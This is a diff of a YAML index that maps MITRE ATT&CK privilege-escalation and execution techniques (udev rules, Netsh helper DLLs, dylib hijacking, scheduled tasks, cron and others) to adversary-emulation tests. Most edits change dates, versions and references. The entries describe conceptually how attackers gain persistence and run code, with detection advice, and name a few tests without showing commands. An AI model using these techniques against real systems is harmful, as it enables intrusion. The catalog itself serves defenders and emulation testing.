+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -27022,7 +27343,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -27046,12 +27367,11 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -27135,11 +27455,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -27191,9 +27510,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account with admin privileges - MacOS
@@ -27300,7 +27618,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -27338,30 +27656,29 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -27408,7 +27725,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -27440,8 +27757,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27455,6 +27772,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27467,16 +27788,19 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -27542,7 +27866,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests: []
   T1129:
@@ -27619,66 +27942,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -27691,31 +27959,83 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -27773,9 +28093,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1559.002:
@@ -27867,20 +28186,19 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests: []
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -27908,7 +28226,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -27928,33 +28246,13 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -27971,6 +28269,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -27981,9 +28280,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -27991,8 +28294,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests:
     - name: Cron - Replace crontab with referenced file
@@ -28092,7 +28411,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -28117,12 +28436,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -28202,11 +28519,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -28266,7 +28582,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests:
     - name: AppleScript
@@ -28287,7 +28602,7 @@ execution:
         name: sh
   T1106:
     technique:
-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -28385,9 +28700,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -28404,19 +28719,18 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests: []
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
